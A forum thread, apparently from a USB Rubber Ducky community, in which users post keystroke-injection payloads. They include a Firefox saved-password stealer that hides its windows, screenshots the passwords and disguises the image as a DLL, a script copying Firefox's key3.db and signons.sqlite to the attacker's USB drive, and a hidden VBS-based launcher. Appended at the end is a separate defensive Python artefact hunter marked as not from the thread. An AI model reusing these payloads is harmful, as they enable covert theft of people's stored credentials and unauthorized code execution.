chickentech Posted January 28, 2013

Hey guys & gals - I'm fairly new to the forum here, but I'm surprised at the number of shared payloads. Can some of you share your cool scripts? Feel free to generalize server addresses and specifics, but I have to think that there are a lot more out there than are in the github... I know I would really appreciate it - and I'm sure others would as well. Thanks in advance!! (and when I finally get something good, I'll be sure to return the favor!)
no42 Posted January 28, 2013

Most are here: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads
chickentech Posted January 28, 2013

As I said in my post - I find this to be such a small number of payloads - surprised really that there aren't more..
Splosh Posted January 31, 2013 (edited)

Firefox plaintext password stealer

I utilized Overwraith's (?) window hiding feature and figured the rest out through trial and error. The script tries to be as stealthy as possible about what's happening, but that slows down the run speed from 12s to 15s and it may look even more suspicious when windows are trying to hide themselves. The hiding sections are separated with comments so you can remove them rather easily. The delay times are somewhat strict; you may need to play with them to make it work on a slower machine. I went for tab + arrow navigation to make it more suitable for multi-lingual use compared to alt+letter navigation. I had some problems with REM and REPEAT commands (used the Duck Encoder 2.2 and naked Duck version 2 firmware) so the code has been stripped from the hundreds of DOWNARROW commands.

Things to keep in mind

- If Firefox starts in full screen mode it won't hide itself. The script however still does what it needs to.
- The navigation to settings assumes the browser is using the Firefox default start page (with six quick navigation icons at the bottom). If the target machine is using a custom home page, for an en_US browser change "Within FF, scroll to settings" to:
  ALT T
  DELAY 50
  STRING O
  DELAY 200
- If the passwords saved in Firefox are secured with a master password, the script simply won't work.

Important: Firefox memorizes the last settings tab used. AFAIK Ducky can't navigate to a specific tab but it can scroll between them, so make sure settings were closed with the General tab open before running the script. Otherwise you'll end up with an image of language settings or worse.

This is the first bigger one I've made so feedback is appreciated ^_^

The Script

REM I had some problems with the first commands after firmware upgrade so as a lazy solution I run meaningless stuff first
GUI R
DELAY 50
ALT F4
DELAY 50
REM Open firefox
GUI R
DELAY 50
STRING firefox
ENTER
REM FF Load delay: needs to be at least as long as the firefox startup time.
DELAY 500
DELAY 500
DELAY 500
DELAY 500
REM Hide the window
ALT SPACE
STRING M
DELAY 10
DOWNARROW
REPEAT 100
DELAY 300
ENTER
REM Within FF, scroll to settings
DELAY 300
TAB
DELAY 5
TAB
DELAY 5
TAB
DELAY 5
TAB
DELAY 5
TAB
DELAY 5
TAB
DELAY 5
TAB
DELAY 5
TAB
DELAY 5
ENTER
DELAY 200
REM Hide settings window
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM Scroll to Security tab and then highlight and open "Saved Passwords..."
LEFTARROW
DELAY 10
LEFTARROW
DELAY 10
LEFTARROW
DELAY 10
SHIFT TAB
DELAY 10
SHIFT TAB
DELAY 10
SHIFT TAB
DELAY 10
SHIFT TAB
ENTER
REM Enable "Show Passwords"
DELAY 200
TAB
DELAY 10
TAB
DELAY 10
TAB
DELAY 10
ENTER
DELAY 100
ENTER
REM Maximize password window and take a print screen
ALT SPACE
DELAY 10
UPARROW
DELAY 10
UPARROW
DELAY 10
ENTER
DELAY 50
PRINTSCREEN
REM Return window size back to normal, close window, navigate back to General tab and close settings
ALT SPACE
DELAY 10
ENTER
DELAY 50
ALT F4
DELAY 10
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
LEFTARROW
DELAY 50
LEFTARROW
DELAY 50
LEFTARROW
DELAY 50
LEFTARROW
DELAY 50
LEFTARROW
DELAY 50
ALT F4
DELAY 50
ALT F4
DELAY 50
REM Open paint, paste the image and save it as a DLL lookalike just in case it doesn't disappear from the user's computer: DLLs are common and not usually opened. Also they won't arouse that much suspicion on the attacker's USB drive.
GUI R
DELAY 50
STRING pbrush
DELAY 10
ENTER
DELAY 200
CTRL V
DELAY 200
CTRL S
DELAY 200
STRING %homedrive%\Users\%username%\thumbnails.dll
DELAY 10
ENTER
REM In case file already exists, overwrite
LEFTARROW
ENTER
REM Close paint and take a print screen of desktop to get rid of password image on clipboard
ALT F4
DELAY 10
PRINTSCREEN
DELAY 10
REM Open CMD prompt and hide it
GUI R
DELAY 10
STRING cmd
DELAY 10
ENTER
DELAY 200
REM Hide the CMD window
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
DELAY 10
REM Move the file to external media
REM This was a tricky part since it's hard to predict the directory. The script first tries a reasonable prediction for the "highest" drive letter on the machine (H:\), which was probably assigned to the attacker's external media inserted last.
REM It then reruns the MOVE command scrolling drive letters backwards one by one in the alphabet. If H: doesn't exist, cmd just returns "The system cannot find the drive specified".
REM If G: does exist, the file is moved there (cmd returns "1 file(s) moved".) and it no longer can be copied to F:, E: or D:. In those cases cmd returns "The system cannot find the file specified".
STRING MOVE /Y %homedrive%\Users\%username%\thumbnails.dll H:
DELAY 50
ENTER
REM Try drive letter G
DELAY 10
UPARROW
LEFTARROW
BACKSPACE
STRING G
ENTER
REM Try drive letter F
DELAY 10
UPARROW
LEFTARROW
BACKSPACE
STRING F
ENTER
REM Try drive letter E
DELAY 50
UPARROW
LEFTARROW
BACKSPACE
STRING E
ENTER
REM Try drive letter D
DELAY 50
UPARROW
LEFTARROW
BACKSPACE
STRING D
ENTER
REM Exit the cmd
DELAY 10
STRING exit
ENTER
REM Finally, hide what has been written in the Run... window the last time it was used; note that the run history remains
REM but one rarely bothers to use the drop down menu when hands are all the way away from the mouse.
REM The reason I didn't use Overwraith's argumented cmd earlier was this: it looks more suspicious in the drop down menu as well.
DELAY 10
GUI R
DELAY 10
STRING notepad
DELAY 10
ENTER
DELAY 50
ALT F4
REM When you're done, rename the thumbnails.dll to ffpwd.png (or the name of your choosing) and open the image file.

Edited February 6, 2013 by midnitesnake: Corrected Formatting
Shark3y Posted January 31, 2013

I did a similar script for OSX and when it comes to Firefox, stealing the key3.db and signons.sqlite files seems to be quicker, though the method you use is definitely ingenious. I especially like saving the image file as a dll. Very crafty.
Splosh Posted February 1, 2013 (edited)

> I did a similar script for OSX and when it comes to Firefox, stealing the key3.db and signons.sqlite files seems to be quicker, though the method you use is definitely ingenious. I especially like saving the image file as a dll. Very crafty.

This works much better. Huge thanks to you! Here's my script

GUI R
DELAY 100
STRING cmd
ENTER
DELAY 150
STRING cd %homepath%/AppData/Roaming/Mozilla/Firefox/Profiles
ENTER
STRING cd
SPACE
TAB
ENTER
STRING COPY key3.db %homepath%\Contacts
ENTER
STRING COPY signons.sqlite %homepath%\Contacts
ENTER
STRING MOVE /Y %homepath%\Contacts\key3.db G:
ENTER
UPARROW
LEFTARROW
BACKSPACE
STRING F
ENTER
UPARROW
LEFTARROW
BACKSPACE
STRING E
ENTER
UPARROW
LEFTARROW
BACKSPACE
STRING D
ENTER
STRING MOVE /Y %homepath%\Contacts\signons.sqlite G:
ENTER
DELAY 200
UPARROW
LEFTARROW
BACKSPACE
STRING F
ENTER
DELAY 200
UPARROW
LEFTARROW
BACKSPACE
STRING E
ENTER
DELAY 200
UPARROW
LEFTARROW
BACKSPACE
STRING D
ENTER
DELAY 200
STRING exit
ENTER

Edited February 6, 2013 by midnitesnake: Corrected Formatting
Maclover25 Posted July 2, 2013

We should have just one section where people can put their payloads so you don't have to look all over for payloads.
overwraith Posted July 2, 2013 (edited)

> We should have just one section where people can put their payloads so you don't have to look all over for payloads.

Somebody suggested it once, but nobody ever implemented it.

Wrote this the other night; it auto-runs a Java class file located on the Ducky SD. Twin Duck firmware. The class name is JavaApp and will need to be renamed to whatever the name of the Java application is. I don't know if Java can even be used for hacking, but it can be used for stuff like making sockets, and directory walking stuff.

REM Author: overwraith
REM Name: Java_Application.txt
REM Purpose: Run a java application off the ducky drive after it mounts.
REM Encoder V2.4
REM Using the run command for a broader OS base.
DEFAULT_DELAY 25
DELAY 3000
GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM Change directories because System32 appears to be protected.
STRING CD %TEMP%
ENTER
REM Make batch file that waits for SD card to mount.
REM Delete batch file if it already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:)
ENTER
STRING if Exist %DUCKYdrive% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING %DUCKYdrive%
ENTER
STRING cd Java_Application
ENTER
STRING Java JavaApp
ENTER
CONTROL z
ENTER
REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if it already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER
REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
STRING EXIT
ENTER

Edited July 2, 2013 by overwraith
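As an added defensive example (not code from this thread or its authors): a small Python hunt for the on-disk traces the payloads above leave behind, covering Splosh's screenshot saved as thumbnails.dll, the key3.db / signons.sqlite copies dropped in Contacts, and overwraith's DuckyWait.bat / invis.vbs in %TEMP%. It assumes Paint wrote PNG data under the .dll name (as the rename-to-.png step implies) and that the caller passes in the profile and %TEMP% directories; the sample files are constructed in a temp directory so it runs offline.

```python
import tempfile
from pathlib import Path

# Artefacts named in the posted payloads, relative to the user profile and %TEMP%.
PROFILE_ARTEFACTS = ["thumbnails.dll", "Contacts/key3.db", "Contacts/signons.sqlite"]
TEMP_ARTEFACTS = ["DuckyWait.bat", "invis.vbs"]

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"  # first 8 bytes of every PNG file
PE_MAGIC = b"MZ"                   # first 2 bytes of every real DLL/EXE


def classify_dll(head: bytes) -> str:
    """Describe a file carrying a .dll name from its leading bytes."""
    if head.startswith(PE_MAGIC):
        return "PE header, consistent with a real DLL"
    if head.startswith(PNG_MAGIC):
        return "PNG data saved under a .dll name"
    return "neither PE nor PNG header"


def hunt(profile_dir: Path, temp_dir: Path) -> list[tuple[str, str]]:
    """Return (relative path, finding) pairs for every artefact present on disk."""
    findings = []
    for rel in PROFILE_ARTEFACTS:
        path = profile_dir / rel
        if not path.is_file():
            continue
        if path.suffix.lower() == ".dll":
            findings.append((rel, classify_dll(path.read_bytes()[:8])))
        else:
            findings.append((rel, "Firefox credential store copied out of the profile"))
    for rel in TEMP_ARTEFACTS:
        if (temp_dir / rel).is_file():
            findings.append((rel, "dropper artefact in %TEMP%"))
    return findings


def demo() -> list[tuple[str, str]]:
    """Constructed sample layout (not a real machine): a PNG saved as thumbnails.dll,
    a copied key3.db, and the VBS launcher left in %TEMP%."""
    root = Path(tempfile.mkdtemp())
    profile, temp = root / "profile", root / "temp"
    (profile / "Contacts").mkdir(parents=True)
    temp.mkdir()
    (profile / "thumbnails.dll").write_bytes(PNG_MAGIC + b"\x00" * 16)
    (profile / "Contacts" / "key3.db").write_bytes(b"constructed placeholder")
    (temp / "invis.vbs").write_text("' constructed placeholder\n")
    return hunt(profile, temp)
```

Call demo() to run the hunt over the constructed sample; on a real host, pass the user's profile root and %TEMP% to hunt() instead.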